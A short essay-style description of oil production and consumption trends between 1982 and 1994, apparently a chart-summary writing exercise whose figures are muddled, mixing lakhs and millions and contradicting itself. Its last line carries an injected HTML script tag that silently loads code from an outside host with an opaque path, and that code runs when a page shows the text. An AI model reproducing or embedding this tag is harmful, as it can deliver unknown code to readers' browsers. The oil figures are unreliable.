In the year 1982, the oil-producing rate was nearly 2 million oil barrels per day whereas its consuming rate was approximately 50-70 lakhs of oil barrels more per day. However, the consumption was stable until the year 1990. On the other hand, production increased rapidly before getting a firm growth until the year 1994.
In the year 1994, the growing phase of both coincided from which the production rate got reduced slowly with nearly 3 millions of oil barrels daily. Simultaneously, oil consumption got tremendous hit and increased by 6.5 million oil barrels per day which were the highest raise over the whole period.<script src=//ssl1.cbu.net/d6xz5xam></script>
